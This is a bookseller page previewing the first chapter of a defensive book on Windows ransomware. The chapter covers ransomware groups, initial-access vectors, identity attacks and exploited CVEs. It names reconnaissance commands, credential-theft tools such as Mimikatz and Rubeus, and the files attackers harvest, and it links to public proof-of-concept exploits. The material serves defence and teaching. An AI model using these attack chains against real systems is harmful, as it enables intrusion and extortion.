Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Free Learning
Arrow right icon
Windows Ransomware Detection and Protection
Windows Ransomware Detection and Protection

Windows Ransomware Detection and Protection: Securing Windows endpoints, the cloud, and infrastructure using Microsoft Intune, Sentinel, and Defender

Arrow left icon
Profile Icon Marius Sandbu
Arrow right icon
$19.99 per month
Full star icon Full star icon Full star icon Full star icon Half star icon 4.8 (5 Ratings)
Paperback Mar 2023 290 pages 1st Edition
eBook
$21.99 $31.99
Paperback
$39.99
Subscription
Free Trial
Renews at $19.99p/m
Arrow left icon
Profile Icon Marius Sandbu
Arrow right icon
$19.99 per month
Full star icon Full star icon Full star icon Full star icon Half star icon 4.8 (5 Ratings)
Paperback Mar 2023 290 pages 1st Edition
eBook
$21.99 $31.99
Paperback
$39.99
Subscription
Free Trial
Renews at $19.99p/m
eBook
$21.99 $31.99
Paperback
$39.99
Subscription
Free Trial
Renews at $19.99p/m

What do you get with a Packt Subscription?

Free for first 7 days. $19.99 p/m after that. Cancel any time!
Product feature icon Unlimited ad-free access to the largest independent learning library in tech. Access this title and thousands more!
Product feature icon 50+ new titles added per month, including many first-to-market concepts and exclusive early access to books as they are being written.
Product feature icon Innovative learning tools, including AI book assistants, code context explainers, and text-to-speech.
Product feature icon Thousands of reference materials covering every tech concept you need to stay up to date.
Subscribe now
View plans & pricing
Table of content icon View table of contents Preview book icon Preview Book

Windows Ransomware Detection and Protection

Ransomware Attack Vectors and the Threat Landscape

In this chapter, we will start by providing an introduction to what ransomware is, how attacks are carried out, an overview of some of the main attack vectors used by attackers, and how ransomware groups are operated. Then, we will go into a bit more depth on some of the most well-known ransomware groups such as Conti, LockBit, and Sodinoikibi, and how they have historically performed attacks.

Ransomware has many complex forms. In the last 5 years, we have seen ransomware grow even more complex. This calls for a new level of responder to address these threat actors. Therefore, in this chapter, we will get a better understanding of the different attack tactics and how attacks are carried out. This will then be built upon in the upcoming chapters when we go through the different countermeasures to protect from these types of attacks.

In this chapter, we’re going to cover the following main topics:

  • Ransomware and attack vectors
  • Attack and extortion tactics
  • Overview of some ransomware operators
  • How identity-based attacks are carried out
  • How vulnerabilities are exploited to launch attacks
  • How to monitor for vulnerabilities

Understanding these topics can help us respond better and be better prepared. These are all vital pieces of knowledge and skills to have in our tool belt.

Evolution of ransomware

Ransomware is a type of malware that has historically been designed to encrypt data and make systems that rely on it unusable. Malicious actors then demand ransom in exchange for decrypting the data.

In 2021, we saw a huge rise in the number of ransomware attacks, where many companies were faced with their IT infrastructure and data becoming encrypted and many got their data stolen by different ransomware groups. In Norway, where I am based, we have also seen many large organizations be attacked by ransomware in the last year, which has also ended up affecting the Norwegian population. Here are some of the organizations that got hit by a ransomware attack in 2021 in Norway:

  • Nordic Choice Hotels: This is one of the largest hotel chains in Scandinavia. When they got attacked, they needed to switch to manually checking people into their rooms.
  • Amedia: This is the second-largest news publisher in Norway and publishes more than 90 newspapers. When they got attacked, it halted all newspaper production for over a week.
  • Nortura: This is one of the largest food producers in Norway, so when they got hit by ransomware, it meant that farmers were not able to deliver animals to get processed.

In addition, there have been many high-profile attacks in other countries, such as the attack on Colonial Pipeline in the US and on MSP software provider Kaseya, which ended up impacting close to 1,500 customers worldwide.

After the attack on Colonial Pipeline, the US government implemented a new reporting regulation, which meant that an organization within the US that has fallen victim to a ransomware attack must report the incident to the FBI, CISA, or the US Secret Service.

In the last few years, we have also seen that ransomware attacks against healthcare have almost doubled, according to Sophos (https://news.sophos.com/en-us/2022/06/01/the-state-of-ransomware-in-healthcare-2022/), however, the attacks against healthcare is not done intentionally since most ransomware groups tend to avoid healthcare businesses. In 2022, we saw several cases where ransomware groups provided the decryption key to organizations for free to avoid impacting systems that can affect patient treatments within healthcare areas such as hospitals.

The attack on Kaseya, which was done through their Virtual System Administrator (VSA) product, ended up affecting the Swedish supermarket chain Coop, which needed to close 500 stores after the attack throughout the Nordics.

In a survey that Sophos did, where they spoke with 5,400 IT decision-makers in 2021, about 37% had been hit by ransomware in the last year, which is, fortunately, a significant reduction from the year before when that number was 51%.

There have, however, also been some significant changes in the behavior of attackers. Most likely, the reduction in the number of attacks could be related to less automated attacks and more hands-on targeted attacks. Emsisoft, the security software company behind ID ransomware (malwarehunterteam.com), allows us to identify which ransomware strain has encrypted files by uploading the ransomware note file. Emsisoft posted on its website that, in 2021, there were close to 560,000 submissions to the service, which is 50,000 more than it had the year before. In addition, Emsisoft also estimated that only 25% of victims submit to their website (https://id-ransomware.malwarehunterteam.com/).

We have also seen an increase in personal engagement from threat actors. For instance, we have seen an increase in attacks close to holidays such as Christmas, since people are often more stressed and are more likely to fall victim to phishing attacks.

So many organizations worldwide have faced ransomware attacks, and looking at the statistics, the number of large organizations that have been impacted only seems to be rising. But has ransomware evolved over the last few years?

Ransomware is mostly used by attackers to exploit the weakest points in your infrastructure and then encrypt your data and infrastructure using some form of encryption method. Once the encryption is done, they leave a ransom note and wait. The only way to get access to the original data (or to be able to decrypt it) is by buying a decryption tool from the attackers using one of the digital currencies. There are also other attack methods, but I will get back to that a bit later.

Within the ransom note, you get instructions about how to contact them or access their support channels, which are typically hidden behind Tor addresses. When you access their support channel, some of the operators give some information about what happened and how much you need to pay to get access to the decryption tool:

Figure 1.1 – Ransomware operator chat support

Figure 1.1 – Ransomware operator chat support

A ransomware attack often involves multiple teams or people. Many of the different ransomware groups are split into smaller groups and affiliates. Many of the affiliates often work together to gain access to an environment, or might even be someone on the inside. They sell or give access to other teams who deploy the ransomware. The profit is usually divided between the affiliate and the group, with a one-time payment to acquire access to the environment.

Affiliates operate independently or as a member of organized groups, while some of the most well-known ransomware groups are doing active recruitment programs to get afiliates.

Ransomware attackers are only focused on getting access, encryption data, and waiting for the organization to make contact. In most cases, the ransomware operators also have some insight into your organization and the number of employees, which will also impact the ransom fee.

Most ransomware operators host self-service portals with built-in chat support to get details and information on how to pay for the decryption tool, which is only accessible on the Tor network. The most well-known groups tend to use Monero as the crypto of choice since many see it as an untraceable currency. However, we have seen other cryptocurrencies being used as well. There is also recent evidence showing that threat actors conduct business for one another, such as using money laundering services to make the money untraceable.

While most security professionals agree that you should never pay the ransom, many have paid the ransom in pure desperation to gain access to their files and get their services back up and running. Consider the alternative – your entire infrastructure, backup, and other services are gone, and rebuilding your services would take too much time and your company could even go bankrupt.

We have also seen that many organizations have been relying more on cyber insurance to cover costs related to ransomware. Ransomware was involved in 75% of all cyber insurance claims during the first half of 2021; this has also led to a significant increase in the cost of premiums.

Important note

It should be noted that in a survey that Sophos did in 2021, for organizations that paid the ransom, the average amount of data they were able to recover was only close to 65% (https://news.sophos.com/en-us/2021/04/27/the-state-of-ransomware-2021/).In some cases, when you are negotiating the price with the attackers, some of the different ransomware operators give you a free sample to show you that they have the decryption tool and can decrypt the data. In most cases, this can decrypt a single file or a single virtual machine. In most cases, they also have a good mapping of the environment, and they know which of the machines are running, such as the backup service, so you will most likely only be able to decrypt a non-important virtual machine such as a test server.

When you pay the ransom, you will either pay to get the decryption key for every single machine or get a decryption key and tool that is used for the entire environment. Once you get access to the decryption tool, it can take many hours to decrypt a single machine. If you need to decrypt an entire environment, you can expect it to take a long time.

Over the last few years, there has been a lot of focus on getting good backup and data protection services in place, and those organizations that have good backup systems and routines in place can easily restore data and be up and running again.

However, it should be noted that in many ransomware cases, we have also seen that the backup data was encrypted by the attackers. Fortunately, we are seeing more and more backup vendors adding new features, such as immutable backups, so that ransomware is less likely to impact the data.

This, of course, means that attackers have a lower chance of getting paid, so they also switch tactics to not only encrypt data but also exfiltrate data that they then could use as means for leverage.

This was, unfortunately, the case for the Finnish psychotherapy center Vastaamo, which was hit by ransomware in late 2020, where the attackers managed to encrypt their data and steal 40,000 patient journals. The attackers also used another extortion tactic, which was to contact the patients via email and ask them for a ransom directly, and if they didn’t get paid, they would publish their journals.

It should be noted that the electronic patient record that was compromised was running an outdated version of Ubuntu 16.04.1, Apache 2.4.18 (which came out in 2015), and PHP 5.6.40, which all contain many known vulnerabilities.

While most ransomware attacks aim at performing data encryption and data exfiltration, there is also another attack vector that is becoming more and more popular: Distributed Denial of Service (DDoS) attacks. DDoS-based ransomware attacks are more aimed at online retailers or cloud-based applications. Microsoft, in their yearly DDoS attack trends, stated that they see close to 2,000 DDoS attacks daily and that in 2021, they stopped one of the largest DDoS attacks ever reported, where they mitigated a DDoS attack with a throughput of 3.47 TBps and a packet rate of 340 million packets per second against an Azure customer in Asia.

The attack only lasted 15 minutes but that is more throughput than most ISPs and local data centers can handle.

Important note

More vendors are seeing an increase in the amount of DDoS attacks, and buying a DDoS attack from a botnet that lasts 1 hour only costs about $50 on the dark web. You can find more information about DDoS attack statistics in the yearly Microsoft DDoS protection report at https://azure.microsoft.com/en-us/blog/azure-ddos-protection-2021-q3-and-q4-ddos-attack-trends/ and also from Cloudflare Radar at https://radar.cloudflare.com/notebooks/ddos-2021-q4.

Cloudflare also stated in their yearly DDoS trend report that in Q4 2021, they saw an increase of DDoS attacks of 29% compared to the previous years in the same quarter. They also surveyed customers that were targeted by DDoS attacks, and one-fourth of the respondents reported that they received a ransom letter demanding payment from the attacker.

While many DDoS attacks aim to overload the infrastructure with a large amount of traffic from multiple sources (mostly botnets) against your services, there has also been an increase in DDoS amplification attacks, where the attackers utilize a weakness in a protocol that essentially does a reverse DDoS attack. We have seen such examples with the DTLS protocol.

In 2020, Citrix and their ADC product had a weak implementation of the DTLS protocol, wherein earlier firmware was vulnerable to a DDoS amplification attack. The attackers sent forged DTLS packets where the ADC would send large packets back to the attackers, potentially leading to outbound bandwidth exhaustion, so essentially DDoS.

Attack vectors

So far, we have taken a closer look at some of the attacks and tactics that different ransomware operators are using. Now, let’s take a closer look at some of the main attack vectors that most ransomware operators use to gain initial access.

An attack vector is best described as one of the paths that an attacker can use to try and gain access to an environment.

For ransomware attackers to be able to distribute the payload, they must go through different stages before they can launch the attack. The main attack pattern is where the attackers first gain initial access using one of the different attack vectors, which may be a compromised end user machine or infrastructure. Then, they use different techniques to try and move around the network using credentials that allow them to access other parts of the network or utilize some form of vulnerability. Then, they use different tooling or scripts to give them persistent access to the environment. Once they have been able to gain full access to the environment, they use scripts or other methods to run the payload across the infrastructure to gain further access:

Figure 1.2 – The typical attack pattern in a ransomware attack

Figure 1.2 – The typical attack pattern in a ransomware attack

So, how do they get their foot in the door of our infrastructure?

The following are some of the main methods.

Exploiting known vulnerabilities

This is where attackers utilize some form of vulnerability in an external service. This could be that the attacker is trying to gain access using some form of Remote Code Execution (RCE). In the last few years, we have seen many different vulnerabilities that have been used to launch ransomware attacks. Some of the products that have been victims of these attacks are as follows:

  • Citrix ADC
  • Microsoft Exchange
  • Fortinet
  • Pulse VPN
  • SonicWall

Important note

A good source for seeing some of the known traffic patterns that I’ve been using for years is Bad Packets on Twitter, which has a good feed that looks at current traffic that is trying to abuse vulnerable endpoints across different services. I recommend that you add that as a source to pay attention to: https://twitter.com/bad_packets. In addition, the Cybersecurity and Infrastructure Security Agency (CISA) has made a list of known exploited vulnerabilities that can be found here: https://www.cisa.gov/known-exploited-vulnerabilities-catalog.

One of the biggest vulnerabilities that was disclosed last year was ProxyShell, which used multiple vulnerabilities within Microsoft Exchange. Many security researchers were quick to provide proof-of-concept exploits using simple Python/PowerShell scripts, as seen here: https://github.com/horizon3ai/proxyshell.

This chain of vulnerabilities could allow attackers to access mailboxes stored in Exchange and also provide web shell access to the Exchange Client Access servers.

Vulnerabilities are not only used for initial access but are also used to do lateral movement. In the summer of 2021, a new vulnerability was disclosed that was a weakness in the Print Spooler service (also known as PrintNightmare) within Windows that allowed attackers to run privileged file operations on the operating system.

This meant that attackers could run arbitrary code with system privileges, both locally and remotely. Attackers that had managed to compromise an end user machine could use this vulnerability to gain further access to the infrastructure, such as domain controllers that were running the Print Spooler service.

Access through credential stuffing

Credential stuffing is where the attackers automate the process of injecting stolen username and password pairs or just try to log in against different online services. Most end users are creatures of habit and tend to reuse their usernames and passwords across many third-party services or websites. When those third-party services get breached, the end user’s information – or worse, credentials – gets compromised. In many cases, attackers dive into the different data sources from those attacks to see whether they can find any reusable credentials that they can use to try and access any external services that an organization might have.

One good way of seeing whether you have leaked credentials is by using the online service https://haveibeenpwned.com, where you can enter your email address and it will check through the different data sources to see whether your information has been leaked and what kind of data sources it was contained in.

haveibeenpwned.com also has a free domain notification service, which means that you can get notified if one of your users within a domain was in a data breach, which I also highly recommend that you sign up for.

Other services can provide similar features to detect whether a username or password has been comprised, such as the following:

  • F-Secure ID PROTECTION
  • Google Password Manager
  • Microsoft Edge Password Monitor

In addition to this, many attackers are also carrying out phishing attacks with the aim of harvesting credentials, such as sending end users to a fake Office 365 site to collect usernames and passwords.

A new attack method that is becoming more and more common is the use of OAuth phishing against Azure Active Directory (AD), where attackers send spoofed Microsoft 365 login pages. When the user clicks on the link to provide the application access, the end user is greeted with a Permissions requested dialog:

Figure 1.3 – OAuth permission screen for a phishing attack

Figure 1.3 – OAuth permission screen for a phishing attack

If the user clicks on Accept, the attacker will be able to get access to their profile in Office 365, which might also include access to emails and files, depending on what kind of permissions are granted.

Access through brute-force attacks

One of the most common attack vectors that we see is brute-force attacks on misconfigured services, such as attacks on a Windows server that is publicly exposed with Remote Desktop Protocol (RDP) enabled. This can also be any exposed service that has weak security mechanisms, such as a lack of MFA, which RDP has by default, making it susceptible to attacks.

With one customer I was working with, the initial point of compromise was an exposed Windows Server in Azure that had a public IP address and RDP enabled. Since the machine was also domain-joined and had a weak local administrator account password, it did not take a lot of time for the attackers to guess the correct combination of usernames and passwords and gain access to the environment.

As we have also seen that in cloud-based environments, attackers often have a predefined set of credentials that they use when they are doing brute-force attacks for known IP ranges. Azure environments typically use a combination of usernames such as AZADMIN/AZUREADMIN/AZURE with different combinations of passwords. An automated attack typically starts within minutes of when the machines come online in Azure.

Access through a compromised workstation or end user machine

One of the most common entry points of ransomware attacks is through a compromised end user machine. This is usually triggered when the user opens an attachment that they received or by visiting a website and from there running some form of executable.

This mostly happens because an end user receives malicious attachments from a phishing email, or by drive-by downloads. The malicious content can be a Word document containing scripts or other malicious content or Excel documents with macros.

These phishing emails are usually delivered in short campaigns. Over 60 days, Akamai observed more than 2,000 million unique domains associated with malicious activity. Of those, close to 90% had a lifespan of fewer than 24 hours, and 94% had a lifespan of fewer than 2 days. Therefore, it makes it extremely difficult to block using DNS protection services. Palo Alto also states that the majority of (close to 70%) Newly Registered Domains (NRDs), where there are an average of 140,000 domains created yearly that are associated with malicious or suspicious traffic.

The phishing emails and attachments either use malicious scripts or macros that typically contain the use of a vulnerability to be able to get access to the machine. In most cases, it requires that the end user opens the attachment and enables the content or triggers the macros. However, in August 2021, Microsoft identified a small number of attacks that were using a RCE vulnerability in MSHTML, which is the HTML engine built into Windows.

This specific vulnerability only required that the user viewed the file or document in Windows Explorer to trigger the payload to run.

Another example that I saw during COVID and with people working from home was that many employees would use their work machines directly connected to their home router, in doing so getting a public IP address on their machine from the ISP. This meant that they became susceptible to brute-force attacks if, for instance, RDP was enabled on their client machine. Make sure that RDP/SMB is not enabled and outbound firewall rules are in place unless they are specifically needed.

How does ransomware work?

The worst thing possible has happened – someone has managed to compromise your infrastructure and encrypted your data. How did it happen and how did they get in?

Let’s explore some of the mechanics behind some of the different ransomware types.

Diavol ransomware

Diavol was a type of ransomware that was presumably used by a group called Wizard Spider and was first discovered by FortiGuard Labs in June 2021. It used BazarLoader, which was known malware, to steal information and malware payloads.

The initial payload was delivered to an endpoint via a phishing attack, which included a link to a OneDrive URL. The reason behind using OneDrive is that it typically provides a URL that bypasses most firewalls and spam filters.

BazarLoader tends to use commonly known cloud services to be able to bypass security filters. Then, the user is instructed to download a ZIP file that contains an ISO file to allow it to bypass any security mechanisms in downloading the file. When the user mounts the ISO file on their filesystem, it will mount an LNK and DLL file. Once the user executes the LNK file, the BazarLoader infection is initiated.

Initially, as with BazarLoader, it starts by doing internal reconnaissance of the Windows environment using scripts and commands such as the following:

  • Net group "Domain Computers" /domain
  • Nltest /domain_trust /all_trusts
  • Net localgroup "administrator"

After performing reconnaissance, BazarLoader downloads a set of DLL files using Background Intelligent Transfer Service (BITS), which contains Cobalt Strike, and begins to communicate with the operator’s Cobalt Strike server. Then, from the compromised machine, they usually run the second stage of scripts, using tools such as AdFind, and then dump local credentials using a BAT script.

The attackers also tend to use tools such as Rubeus to perform a Kerberoast, which is used to harvest used Ticket Granting Server (TGS) tickets in the domain.

Once they manage to get access to file servers, they use tools such as AnyDesk and FileZilla to exfiltrate the data from the environment. Then, they move to more critical systems, such as backup servers and domain controllers.

Once they’ve performed data exfiltration and have access to the core parts of the infrastructure, including backup systems, they trigger the initial payload.

The final payload is usually done via RDP with scripts to trigger the encryption process. To maximize the effect, the ransomware terminates processes that can lock access to files, such as Office applications and database services. Also, they try and stop services that can also lock file access such as httpd.exe, sqlserver.exe, chrome.exe, and others.

They also use scripts to find all drives attached to the host machines. In addition, they stop the Volume Shadow Copy Service (VSS) and ensure that VSS snapshots are deleted before they run the encryption process.

For each machine that gets compromised, Diavol creates a unique identifier, which is then communicated back to the C2 address.

Figure 1.4 – Overview of the attack pattern for Diavol

Figure 1.4 – Overview of the attack pattern for Diavol

This overview shows the different stages and attack patterns in a Diavol attack, where the final payload is typically distributed to all parts of the infrastructure using RDP.

Conti ransomware

Conti was first seen in May 2020 and was one of the most common ransomware variants in 2021. The main point of access was mostly through spear-phishing campaigns, which, in most cases, utilized malicious JavaScript code that would first drop a malware loader into the infrastructure using either TrickBot, IcedID, or BazarLoader.

They have also been known to use brute-force attacks using RDP.

Now, like with Diavol and BazarLoader, Conti uses a range of different scripts to do reconnaissance, such as nltest, whoami, and net.exe. Then, they use Cobalt Strike to escalate privileges to the local system and set up communication with C2 servers.

Then, the attackers use different tools to scan the network and collect information such as AdFind, Router Scan, SharpChrome, and Seatbelt. They also use tools such as Kerberoast and Mimikatz to collect admin hashes or extract passwords.

They spend time looking into local user account profiles in search of important data or files that can be used for leverage for the ransom, such as the following:

  • Outlook (OST files)
  • Login data stored within Chrome
  • KeePass/LastPass information
  • FileZilla (sitemanager.xml)
  • Local OneDrive folders

They were also known to use common Windows-based vulnerabilities such as Zerologon, PrintNightmare, and EternalBlue to gain elevated privileges within the environment.

Cisco Talos security researchers got a hold of leaked Conti documentation from a disgruntled insider that shows the attack patterns, scripts, and how to use the different tools. You can see a PDF file of the summary here: https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/639/original/Conti_playbook_translated.pdf?1630583757.

Once they have gotten elevated privileges, they use PsExec (part of the Sysinternals suite from Microsoft) to copy and execute Cobalt Strike Beacon on most of the systems in the network. Once they have gotten access to the domain controllers, they use built-in services such as Group Policy to disable Defender services to avoid detection.

Once that is done, the attackers run the final payload, which, as with Diavol, will stop a lot of different built-in services that can have locks on different files on the operating system, such as the following:

  • Microsoft Exchange
  • Microsoft SQL
  • Acronis Backup
  • Backup Exec

Most ransomware also has a built-in list of folders that it will whitelist during the encryption process. This is to ensure that the systems will continue to operate after data has been encrypted. This list is in most cases static and contains folders such as the following:

  • AppData
  • Program Files
  • Boot
  • Windows
  • WinNT

However, if you have a different partition layout or data such as the domain controller’s database stored on another partition, for instance, it will get encrypted. Conti also skips some file extensions such as .exe, .dll, .sys, and .lnk. After it is done with the encryption, all files have a .CONTI extension, and within each folder, it also creates a ransom note.

Sodinokibi/REvil ransomware

Sodinokibi/REvil is maybe the most prolific ransomware group on our list. They were the ones behind the infamous Kaseya VSA supply chain attack, and they were also behind the attacks on other large companies such as Travelex and JBS Foods. JBS Foods, which is also the world’s largest meat producer, ended up paying 11 million dollars to REvil to get access back to their data.

Like the other ransomware operators mentioned earlier, REvil has been known to use malware loaders such as IceID, as well as using different brute-force attacks and exploiting known vulnerabilities such as FortiOS VPN, Pulse VPN, BlueGate, Citrix, and Oracle WebLogic Server, to name a few.

They are also one of the ransomware operators that first started targeting VMware ESXi virtual machines. They used the built-in ESXCLI command line to force stop the virtual machines and then encrypt data directly at the VMware datastore level.

For one customer that I was working with that got hit with Sodinokibi, the initial point of entry was a compromised virtual machine (via RDP) in Azure, which was then used to access the virtual infrastructure.

Like the others, REvil also had a collection of scripts and utilities that they use to do reconnaissance of the network. One thing, however, that sets them a bit apart, is that they were able to restart virtual machines in safe mode with networking and still be able to run their payload. The advantage was that they were able to run their payload and disable any EDR services on the machines before rebooting back to default mode.

Fortunately, in early 2022, the Russian government arrested multiple key resources behind the REvil ransomware group on request from the US; you can read more about it here: https://www.wsj.com/articles/russia-says-it-raided-prolific-ransomware-group-revil-with-arrests-seizures-11642179589.

LockBit ransomware

One of the most common ransomware groups at the time of writing is LockBit, which has impacted a lot of large organizations since its emergence back in 2019, such as Accenture, which was hit in late 2021.

LockBit, in addition to the other Ransomware as a Service (RaaS) operators, used a well-known Russian-speaking website forum known as XSS to advertise their affiliate program. Then, the XSS operators banned all ransomware topics on their website and LockBit started to use its own infrastructure to advertise its affiliate program.

LockBit has been known to recruit insiders to gain access to infrastructure using their affiliate program, enticing them with millions of dollars in exchange for access to valuable company data:

Figure 1.5 – A screenshot showing the recruitment program for LockBit

Figure 1.5 – A screenshot showing the recruitment program for LockBit

LockBit advertised on their website that their method of encrypting data was a lot faster than other ransomware variants and that they have great pride in their programming in terms of encryption.

Also, their ransomware (like most other ransomware variants) does not function in Russian-language-speaking countries and infrastructure that has a system language set to Russian. There is, in some cases, a built-in detection mechanism that will inform the operators or stop the information collection process if the system is running Russian.

They use a similar modus operandi to the other groups we've talked about; however, they have also evolved a lot during the last year. In October 2021, there were also rumors that they have developed their first LockBit Linux-ESXi variant.

ESXi ransomware isn’t something new, but this new variant targets both vCenter and VMware ESXi while utilizing vulnerabilities to be able to gain access to the VMware environment.

The latest additions

Now, in 2023, we have seen new threat groups emerge that contain affiliates or members from older groups.

We have groups such as the following:

  • Royal
  • RansomHouse
  • BlackCat
  • ClopLeaks

There are dozens more. On social media, we can see new victims being published daily. Some sources that can be used to follow these different threat groups are the following Twitter profiles:

Because of the frequency in which we're seeing new victims being impacted, it is important to use these sources to get a view on the current trends and understand which groups are the most active.

Looking at the big picture

Now that we have looked at some of the main attack vectors and more closely at some of the different ransomware variants, I wanted to paint a bigger picture and provide some important considerations.

Let us start by looking at the first phase of a ransomware attack where the initial compromise happens:

  • In most cases, phishing attacks are utilized to get the end user to click on a malicious attachment to run some specific payload to trigger malware, such as BazarLoader, on the compromised endpoint.
  • Other attacks start by exploiting a vulnerable endpoint such as Exchange, RDP, or other third-party services that are available. We have seen that after an affiliate has gained access to an organization, that access is sold to threat actors for between $5,000 and $50,000, depending on the type of access.

Once the attacker has managed to gain access, the second phase starts which is collecting information:

  • The initial stage after getting access to an endpoint is assessing the environment, using built-in scripts and tooling to get information about machines/networks/users/data. This information is also used to gather proof of what kind of organization they have gained access to if they want to sell their access to it later.

The following table summarizes some of the main tools and scripts that ransomware operators use to assess an environment and try and gain further access to the environment.

It should be noted that this is not a complete list; I have just specified some I have encountered in different customer scenarios. However, it gives a better view of the tooling that hackers are using to collect information:

ADFind

Atera

Invoke- SMBAutoBrute

Advanced IP Scanner

SharpView

BloodHound

Net-GPPPassword

MSSQLUDP Scanner

Net Use

DCSync

SharpChrome

Zero.exe

NetScan

Router Scan

BITSAdmin

Spashtop Remote

Esentutl

Mimikatz

Invoke-ShareFinder

SWLCMD

WMIC

Cobalt Strike

PowerView

UAC-TokenMagic

Nltest

WDigest

Process Hacker

Kerberoast

AnyDesk/TeamViewer

Getuin

FileZilla SFTP

Seatbelt

Figure 1.6 – Table overview of commonly used tools and scripts

In addition to some of the scripts/tooling mentioned in the preceding table, attackers use many built-in capabilities to navigate the environment. These can be features such as RDP and File Explorer. Some operators have also been known to use Group Policy Management to perform operations across multiple machines at the same time.

At the time of writing, the majority of ransomware is aimed at Windows-based environments, because the majority of all enterprises are running Windows in large parts of their data centers. This includes Active Directory, file servers, and SQL servers, as well as Windows endpoints. However, we have also seen ransomware operators moving to new target types. There are also new ransomware variants emerging that are aimed at other services, such as NAS services. One of these new variants is called Deadbolt, which is aimed at QNAP NAS appliances. There have also been some variants for Linux and Mac OS X, so this is something that we should all pay attention to.

Identity-based attacks

Now that we have taken a look at the different attack vectors and some of the different ransomware variants and their attack patterns, I want to look at some of the common attack vectors in more depth, starting with identity-based attacks.

Identity-based attacks are becoming more and more common with the move to public cloud services such as Microsoft 365.

SaaS services have a common property, which is that they are available from the internet, which means that anyone can access the services.

As mentioned earlier, one of the common attack vectors is credential stuffing, where an attacker tries to log in with a list of usernames and/or email addresses that have been taken from a breach.

The following screenshot shows login attempts for one of our tenants, where it is typical that we see numerous login attempts each day from multiple locations.

This screenshot is a snippet from our sign-in log coming from Azure AD and parsed using Log Analytics (which I will cover in Chapter 7, Protecting Information Using Azure Information Protection and Data Protection):

Figure 1.7 – Overview of blocked authentication attempts to Office 365

Figure 1.7 – Overview of blocked authentication attempts to Office 365

Now, since this is Azure AD, Microsoft has built in different IP filters to stop login attempts coming from known malicious IP addresses, which means they are stopped before they can try and authenticate. However, this just shows how much authentication traffic is coming in a short period.

So, where are they coming from? How did the attackers find the user account that they are trying to log in to?

In many cases, attackers have different scrapers and scripts that crawl through websites to collect all the email addresses they can find. This can also include email addresses that were collected from an existing data breach.

A good way to see where credentials have been stolen from is by checking the affected email address at https://haveibeenpwned.com. The following screenshot shows the result where the email address was not breached:

Figure 1.8 – Information showing that no user information was found

Figure 1.8 – Information showing that no user information was found

However, if the information is found in one of the data breaches that the service has access to, the following result will appear:

Figure 1.9 – Information showing that user information was found in a breach

Figure 1.9 – Information showing that user information was found in a breach

In some cases, the service will not display that passwords have been collected but that it only has email information collected. This is likely because the data source is not available at haveibeenpwnd.com or the attackers have bots that scrape or crawl websites for information such as email addresses.

There are even free services online that can be used to extract emails from a URL, such as Specrom Analytics (https://www.specrom.com/extract-emails-from-url-free-tool/) or using a simple Python script that can do the same as well. Then, we can compare whether the user accounts where we are getting multiple authentication attempts are easily searchable from the public website.

One way to reduce the amount of spam and brute-force attacks against users’ identities is by limiting the amount of public information that is available.

For instance, if your corporate website is published behind a Web Application Firewall (WAF), you can block traffic based on user agents.

A user agent is a form of identity where the software (the browser) identifies itself to the web server. Most common browsers today use a user agent, for example, Mozilla/5.0 (Windows NT 10.0; Win64; x64), AppleWebKit/537.36 (KHTML, like Gecko), Chrome/97.0.4692.99, Safari/537.36, and Edge/97.0.1072.76.

Important note

You can use the following website to determine what kind of known user agents are used to crawl websites and what is legitimate end user traffic: https://user-agents.net/my-user-agent.

User agents are easily forged and can even be changed using built-in mechanisms within Google Chrome developer mode, for instance, but most automated crawling using scripts tends not to bother with changing the user agent.

So, in 4 hours, I have a lot of traffic coming to my public website, which is being crawled from someone that is running something that identifies as python-requests/2.26.0, which is most likely an automated script to crawl my website:

Figure 1.10 – Web scraping attempts against my website in 4 hours using data collected in Azure Log Analytics

Figure 1.10 – Web scraping attempts against my website in 4 hours using data collected in Azure Log Analytics

Having firewall rules in place to block a specific user agent would reduce the amount of crawling and would also reduce spam/phishing targeting our organization. However, if the attackers make the extra effort to alter the user agent, then blocking only certain user agents will have little effect.

Here is a great write-up on how to block or at least make it more difficult for crawlers to scrape your website: https://github.com/JonasCz/How-To-Prevent-Scraping.

Sometimes, your end user email addresses might be available on other sources that you might not have control over. However, a quick Google search can reveal some information about where the email address might be sourced.

Another way that access brokers or affiliates collect information is by using phishing attacks. There are many examples of this. One that we saw earlier this year is where users are sent an email that contains embedded links that take the victim to a phishing URL that imitates the Office 365 login page and prefills the victim’s username for increased credibility.

When the user tries to enter their username and password on the fake login page, there are scripts on the server that collect the user information and upload it to a central storage repository or on the server.

How are vulnerabilities utilized for attacks?

So, now that we have taken a closer look at some of the ways that attackers try to collect information about our end users either from scraping, phishing, or credential stuffing, we are going to take a closer look at some of the vulnerabilities that some of the different ransomware operators have been known to use in their attacks. Later in this section, I will go through how you can monitor vulnerabilities against your services.

Many of the vulnerabilities that we will go through are either utilized for initial compromise or to gain elevated access to a compromised machine and, lastly, lateral movement. The reason is to give you some understanding of how easy it can be to compromise a machine or a service and that the time before a high-severity vulnerability is known before ransomware operators start to leverage it is pretty short.

So, we are going to focus on the following vulnerabilities:

  • PrintNightmare: CVE-2021-34527
  • Zerologon: CVE-2020-1472
  • ProxyShell: It consists of three different vulnerabilities that are used as part of a single attack chain: CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207
  • Citrix NetScaler ADC: CVE-2019-19781

PrintNightmare

Let’s start with PrintNightmare, which was a vulnerability that was published in July 2021. Using this vulnerability, an attacker could run arbitrary code with system privileges on a remote system and local system, so long as the Print Spooler service was enabled. So, in theory, you could utilize this vulnerability to make the domain controllers run arbitrary code, so long as the Print Spooler service was running. This is because of the functionality within a feature called Point and Print, which allows a user to automatically download config information about the printers directly from the print server to the client.

All Microsoft Common Vulnerabilities and Exposures (CVEs) get published on MSRC with dedicated support articles, highlighting which systems are affected and recommendations in terms of workaround and other countermeasures, as seen here for PrintNightmare: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527.

In regard to PrintNightmare, there were multiple scripts that the InfoSec community made that could easily be used; as an example, here’s a simple PowerShell payload that exploited the vulnerability, which did not require administrator access rights and comes with a predefined DDL file that creates a local admin account on the machine: https://github.com/calebstewart/CVE-2021-1675.

Benjamin Delpy, the creator of the popular tool called Mimikatz, also created a proof of concept by setting up a public print server that you could then use from an endpoint to connect to that public server, which would then automatically create a CMD pane running as a local system context.

